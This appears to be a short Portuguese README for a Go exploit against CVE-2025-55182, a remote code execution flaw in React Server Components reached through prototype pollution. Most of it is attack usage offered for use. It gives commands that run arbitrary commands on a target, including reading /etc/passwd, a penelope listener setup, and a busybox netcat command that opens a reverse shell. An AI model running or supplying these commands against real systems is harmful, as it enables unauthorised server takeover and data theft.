
Exploit baseado em Go para CVE-2025-55182, que permite execução remota de código em React Server Components via poluição de protótipo. Suporta execução arbitrária de comandos e payloads de shell reverso.
Exploit para RCE em React Server Components via poluição de protótipo.
go run main.go -t <target> -c <command>
go run main.go -t http://127.0.0.1 -c "id"
go run main.go -t http://127.0.0.1 -c "ls -la"
go run main.go -t http://127.0.0.1 -c "cat /etc/passwd"
Configure o shell reverso
penelope -i 0.0.0.0 -p 1337
Use o busybox:
go run main.go -t http://127.0.0.1 -c "busybox nc 127.0.0.1 1337 -e sh"
go build -o exploit .